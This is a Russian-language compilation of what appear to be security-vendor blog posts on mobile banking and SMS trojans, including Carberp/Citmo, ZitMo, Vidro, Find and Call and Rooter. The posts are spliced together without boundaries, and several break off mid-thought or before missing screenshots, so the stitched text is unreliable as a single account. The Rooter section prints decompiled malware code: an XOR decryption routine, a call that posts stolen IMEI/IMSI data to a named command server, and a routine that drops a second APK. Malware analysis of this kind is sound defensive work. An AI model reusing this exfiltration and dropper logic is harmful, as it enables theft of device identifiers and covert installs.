Мы уже не раз и не два писали об атаках вида Man-in-the-Mobile, целью которых является кража кодов авторизации банковских операций, передаваемых в SMS-сообщениях. До недавнего времени было известно о мобильных версиях двух печально известных банковских троянцев ZeuS (ZeuS-in-the-Mobile, ZitMo) и SpyEye (SpyEye-in-the-Mobile, SpitMo), которые занимались непосредственно кражей SMS-сообщений с кодами от банка. Троянцы ZitMo и SpitMo работают в связке со своими десктопными 'братьями', так как без них они превращаются в обычных SMS-шпионов. Также стоит отметить, что за 2 с лишним года существования подобные атаки были зафиксированы только в некоторых европейских странах: Испания, Италия, Германия, Польша и другие.

Но с появлением мобильной версии троянца Carberp (мы детектируем его как Trojan-Spy.AndroidOS.Citmo, то есть Carberp-in-the-Mobile) подобные атаки стали реальностью и в России. Ни для кого не секрет, что сегодня онлайн-банкинг в России быстро набирает популярность среди пользователей банковских услуг. Банки, в свою очередь, активно развивают данный сервис, в частности внедряя различные способы авторизации операций (в том числе, и mTAN'ы).

Версия троянца Carberp для Windows работает по такому же, как и ZeuS, принципу. Если пользователь, используя зараженный Carberp'ом компьютер, пытается зайти на страничку своего онлайн-банка для авторизации, то зловред модифицирует ее таким образом, что логин и пароль будут отправлены на удаленный сервер злоумышленника вместо сервера банка.

Но помимо логина и пароля злоумышленникам по-прежнему необходимы коды подтверждения для осуществления любого перевода со счета жертвы. Именно поэтому одна из модификаций Carberp (Trojan-Spy.Win32.Carberp.ugu, детектируется нами с 11 декабря) модифицирует страницу онлайн-банкинга, предлагая пользователю скачать и установить программу, якобы необходимую для входа в систему. Причем пользователь может получить ссылку в SMS-сообщении, указав свой номер телефона, либо самостоятельно отсканировать QR-код и получить ссылку:

На скриншоте видно, что под угрозой находились пользователи одного из самых популярных банков в России. 'Сбербанк' 12 декабря вывесил уведомление об этой атаке на своем веб-сайте. Ссылка, зашифрованная в QR-коде, ведет на приложение SberSafe (Trojan-Spy.AndroidOS.Citmo), которое как минимум с 30 ноября находилось в магазине приложений Google Play.

Появление нового семейства вредоносных программ под Android уже никого не удивляет. Особенно когда речь идет об SMS-троянцах, являющихся наиболее популярным и самым старым типом угроз, созданным для отъема денег у пользователей. Новое семейство таких троянцев, получившее название Vidro, появилось несколько дней назад, но нам уже удалось получить немалое количество APK-файлов с похожим функционалом. На данный момент все образцы, найденные нами, нацелены на пользователей из Польши.

Распространение

Trojan-SMS.AndroidOS.Vidro распространяется через порносайты. Механизм очень похож на тот, который мы наблюдали при распространении самой первой вредоносной программы под Android (Trojan-SMS.AndroidOS.FakePlayer). Если пользователь попадает на порносайт с помощью десктопного браузера, то он увидит нечто подобное:

Но если потенциальная жертва каким-либо образом попадет на этот же самый сайт, используя Android-устройство, то порносайт будет "оптимизирован" для экрана смартфона:

Четвертого июля с нами связался наш партнер «МегаФон», являющийся одним из крупнейших сотовых операторов в России. Нас уведомили о подозрительном приложении, версии которого были обнаружены и в App Store, и в Google Play. На первый взгляд могло показаться, что мы имеем дело с SMS-червем, который распространяется посредством отправки коротких сообщений, содержащих ссылку на тело червя, всем контактам из телефонной книги.

Однако наш анализ версий приложения под iOS и Android показал, что это не SMS-червь, а троянец, который загружает телефонную книгу пользователя на удаленный сервер. А «размножение» осуществляется самим сервером, т.е. SMS спам сообщения, содержащие ссылку на приложение, отправляются сервером всем контактам из украденной телефонной книги.

Приложение называется «Find and Call» и до вечера 5 июля было доступно для скачивания и в App Store, и в Google Play. Apple и Google были уведомлены о данном инциденте.

Find and Call в App Store

Find and Call в Google Play

Фактически все комментарии пользователей (и в App Store, и в Google Play) достаточно агрессивны и содержат одну и ту же жалобу на то, что приложение рассылает SMS спам.

Примеры комментариев

Согласно Википедии QR-код (Quick Response) — это матричный код (двухмерный штрихкод), изначально разработанный для применения в автомобильной промышленности. Сегодня QR-коды становятся все более популярными и широко используются в рекламных баннерах, журналах, транспорте и бейджах для обеспечения быстрого и простого доступа к определенной информации. У QR-кода довольно большая емкость по сравнению с обычным штрихкодом: в нем может помещаться 7089 цифровых или 4296 буквенно-цифровых символов. И этого более чем достаточно, чтобы сохранить текст или URL.

А как насчет вредоносных QR-кодов? Да, вы можете с помощью вашего смартфона сосканировать QR-код, а он перенаправит вас на URL с вредоносным файлом (APK или JAR). Такие QR-коды существуют и пользуются все большим спросом.

Сегодня люди, которые пользуются смартфонами, часто ищут программное обеспечение для своих устройств с помощью обычного компьютера. Если пользователь находит что-то интересное, то для того, чтобы загрузить это в смартфон, он должен вручную ввести URL в браузер своего телефона. Это не очень удобно, поэтому такие веб-сайты имеют QR-коды, которые легко сканируются.

Первая версия ZeuS-in-the-Mobile (ZitMo), зловреда, ориентированного на кражу mTAN'ов, была обнаружена в конце сентября прошлого года. Она была опасна лишь для владельцев смартфонов на базе Symbian. Позднее были обнаружены также версии ZitMo для платформ Windows Mobile и Blackberry. Если появление подобных "продвинутых" зловредов для устройств на базе Symbian и Windows Mobile было ожидаемо, то выбор Blackberry в качестве мишени явился до некоторой степени сюрпризом. Еще более удивительно, что до июля 2011 года не было ни намека на существование ZitMo для Android. Но теперь все изменилось.

Первое, что непременно надо отметить, ― это существенная разница между ZitMo для Android и его предыдущими версиями. ZitMo для Symbian, Windows Mobile и Blackberry схожи по логике и функционалу: мобильный C&C номер, одинаковый набор SMS-команд, а также возможность пересылать хозяину SMS-сообщения с определенного номера и сменять центр управления. Логика ZitMo для Android намного примитивнее. Размер apk-файла составляет лишь 19 КБ. Этот зловред выдает себя за компонент безопасности от компании Trusteer. После установки вредоносного приложения в главное меню будет добавлена иконка «Trusteer Rapport»:

А вот что появится на экране, если кликнуть по этой иконке:

Вчера мой коллега Тим Армстронг написал о всплеске вредоносной активности на Android Market. Вкратце - несколько легальных приложений были заражены троянцами и загружены в Android Market. Давайте рассмотрим эти приложения поближе.

Как уже ранее упоминалось, все вредоносные приложения, с которыми мы имели дело до настоящего времени, использовали одни и те же эксплойты, классифицирующиеся «Лабораторией Касперского» как Exploit.AndroidOS.Lotoor.g и Exploit.AndroidOS.Lotoor.j. Оба хорошо известны и работают на всех версиях операционной системы Android ниже 2.3. Это значит, что любой пользователь Gingerbread (Android 2.3) должен быть защищен от этих эксплойтов.

Итак, что конкретно крадут эти троянцы? Похоже, злоумышленник очень хотел заполучить номера IMSI и IMEI. Кроме того, они собирают информацию об операционных системах и типах устройств.

Кража происходила так: внутри кода есть блок зашифрованной информации размером ровно 45 байт. Этот блок зашифрован с использованием простого XOR-алгоритма с помощью специального ключа, который хранится в другом блоке под названием “KEYVALUE”. Если вам интересно, то подпрограмма для дешифрования выглядит вот так:

public static void crypt(byte abyte0[ ])
====={
=====int i = 0;
=====int j = 0;
=====do
=========={
==========int k = abyte0.length;
==========if(j >= k)
===============return;
==========byte byte0 = abyte0[j];
==========byte byte1 = KEYVALUE[i];
==========byte byte2 = (byte)(byte0 ^ byte1);
==========abyte0[j] = byte2;
==========i++;
==========int l = keylen;
==========if(i == l)
===============i = 0;
===============j++;
==========}
=====while(true);
=====}

После расшифровки первый блок информации указывает на hxxp://184.105.245.17:8080/GMServer/GMServlet, который «приютил» провайдер по имени Hurricane Electric (http://www.he.net/) в г. Фремнонт, Калифорния. Мы уже связались с Hurricane Electric по поводу этого провайдера и порекомендовали его остановить. На момент написания этого блога вредоносный сервер был уже недоступен.

Как мы уже говорили, троянец скорее всего, был создан для того, чтобы собирать коды IMEI и IMSI, а также специальную информацию об устройствах. Украденные данные передаются на сервер киберпреступников методом POST через НТТР-протокол. Загруженные блоки имеют формат XML и выглядят вот так:

Стандартный формат XML-шаблона

Информация, переданная Backdoor.AndroidOS.Rooter.a

Информация, переданная Backdoor.AndroidOS.Rooter.b

POST-метод, используемый Backdoor.AndroidOS.Rooter

Командное поле, установленное на «0» в приведенном выше блоке, информирует о загрузке похищенных IMEI и IMSI-кодов вместе с информацией об устройстве. Вы можете видеть, что информация в тегах имеющихся у нас двух разных вредоносных АРК-файлов, отличается: ProductId имеет два значения - 10023 и 10039. Очевидно, злоумышленник хотел посчитать долю успешных попыток разных троянцев достигнуть цели. Хотим так же заметить, что информация в теге (‘502’) одинакова в обоих образцах. Этот тег заставляет нас задуматься – может ли этот ‘502’ быть своего рода ID-компаньоном или партнером. Если это так, то возникает вопрос, как много было (или есть) там таких компаньонов.

Чтобы избежать многократной отправки одной и той же информации, троянец после успешной загрузки устанавливает параметр предпочтений ‘pref_config_setting’ на значение "done":

public void run()
====={
if(Setting.access$1(Setting.this).getSharedPreferences("pref_config_setting",0).getInt("done",0)== 0)
=========={
==========byte abyte0[] = val$c;
==========String s = new String(abyte0);
==========Context context = Setting.access$1(Setting.this);
==========Setting.postUrl(s, context);
==========}

Помимо рассылки похищенных IMEI и IMSI-кодов троянец устанавливает еще один модуль. Он делает это, копируя файл внутреннего ресурса sqlite.db в DownloadProvidersManager.apk:

private void destroy(boolean flag)
{
=====boolean flag1;
=====if(flag && !isPackageInstalled(ctx, "com.android.providers.downloadsmanager"))
==========flag1 = cpFile(ctx, "sqlite.db", "DownloadProvidersManager.apk");
=====stopSelf();
}

Итак, каково же назначение этого второго модуля? Он подсоединяется обратно к тому же серверу, где он загружал похищенные IMEI и IMSI-коды, но с другим блоком запроса (Команда «2»). В это раз он считывает ответ с сервера, который, судя по всему, включает список приложений для загрузки и установки на уже зараженное устройство.

Модульная архитектура троянца интересна и позволяет сделать несколько важных выводов. Прежде всего, он был создан таким образом, чтобы его было легко включать в популярные приложения для загрузки на Market с дезориентирующими именами. Во-вторых, он имеет классическую административно-управленческую архитектуру: он рассылает начальный запрос «Я здесь» (I’m here) c базовой информацией, а затем разворачивает более сложный загрузчик для дальнейшего заражения устройства. Это характерно для многих Windows-троянцев. И наконец, возможность инсталлировать другие приложения на устройства указывает на способ, которым вирусописатель планировал заработать на заражениях – размещая рекламное ПО или приложения рекламного характера.

Мы будем продолжать следить за ситуацией и сообщать обо всех изменениях.

Пару дней назад на некоторых сайтах в Рунете, распространяющем ПО для смартфонов и КПК появились жалобы на то, что практически все новые CAB-файлы (установочные архивы для смартфонов с ОС Windows Mobile) содержат «лишних» 2 исполняемых файла. Причем оба файла встречались в архивах с совершенно разными программами или играми.

Неудивительно, что оба файла оказались вредоносными. Первый файл, устанавливающийся в систему с именем srvupdater1.exe, на самом деле является троянцем-загрузчиком, детектируемым нами как Trojan-Downloader.WinCE.MobUn.a. Второй файл (устанавливается в систему под именем msservice.exe) оказался SMS-троянцем, который детектируется как Trojan-SMS.WinCE.MobUn.a.

Оба троянца получают параметры для своей работы с URL’а вида http://m*******t.ru/index.php?******=param.

21 февраля польский консультант по информационной безопасности и блогер Piotr Konieczny написал (по-польски) о новой волне атак с использованием троянской программы ZeuS. Жертвами злоумышленников стали польские пользователи — клиенты банка ING.

Для атаки были применены образцы троянца, предназначенные для различных платформ: Trojan-Spy.Win32.Zbot.bbmf для Windows, Trojan-Spy.SymbOS.Zbot.b для Symbian и Trojan-Spy.WinCE.Zbot.a для Windows Mobile. На этот раз ZeuS для мобильных устройств, известный как ZeuS in the Mobile (ZitMo), не обошел стороной пользователей смартфонов на базе Windows Mobile.

Эта атака очень похожа на первую атаку ZitMo в конце сентября 2010 года. После заражения компьютера под управлением Windows троянец Zbot точно так же предлагал пользователю ввести название модели смартфона и номер телефона для «обновления сертификата». После этого пользователь зараженного компьютера получал SMS-сообщение со ссылкой на «обновленный сертификат» (на самом деле — на версию троянца ZeuS для соответствующей мобильной платформы). В случае загрузки и установки вредоносного файла все входящие сообщения (в том числе содержащие код mTAN, используемый для аутентификации в системах онлайн-банкинга), незаметно для пользователя пересылались на прописанный в теле троянца мобильный номер.

Новая версия ZeuS для устройств на базе Symbian (детектируемая как Trojan-Spy.SymbOS.Zbot.b) аналогична предыдущей — команды и функции у обеих одинаковые. И у версии ZeuS для Windows Mobile (детектируемой как Trojan-Spy.WinCE.Zbot.a) такие же функции и даже команды. Например, после успешного заражения мобильного устройства обе версии отсылают сообщение на один и тот же (британский) мобильный номер:

Две недели назад мы писали о SMS-спам рассылке. Текст сообщения содержал предложение перейти по ссылке и получить MMS-подарок от некой Кати. Перейдя по ссылке, пользователю предлагалось загрузить файл, который на самом деле являлся вредоносным и детектировался нами как Trojan-SMS.J2ME.Smmer.i.

Так вот, «Катя» вернулась.

Мы зафиксировали очередную SMS-спам рассылку со схожим текстом. В SMS’ке также содержались URL’ы вида http://s****mms.ru/Photo-Katya.jar или http://mms****.ru/Photo-Katya.jar. JAR-файл детектируется нами как Trojan-SMS.J2ME.Smmer.i. Если пользователь запустить данный файл на своем мобильном телефоне или смартфоне с поддержкой J2ME, то он увидит следующий текст:

Только что выпущена новая версия Android Market, которая позволяет каждому пользователю устройства выбирать приложения, покупать и даже удаленно устанавливать программы на устройство с операционной системой Android непосредственно из браузера настольного компьютера. Подождите, как это удаленно устанавливать? Может быть, мы что-то не так поняли?

Нет, это официальная функция нового онлайн-сервиса. Если вы пользуетесь Android-устройством, значит, у вас есть привязанный к нему Gmail-аккаунт и, значит, теперь вы можете удаленно установить любое приложение из Android-Market. Вам нужно всего лишь:

• залогиниться на сервисе через Gmail-аккаунт, привязанный к вашему смартфону;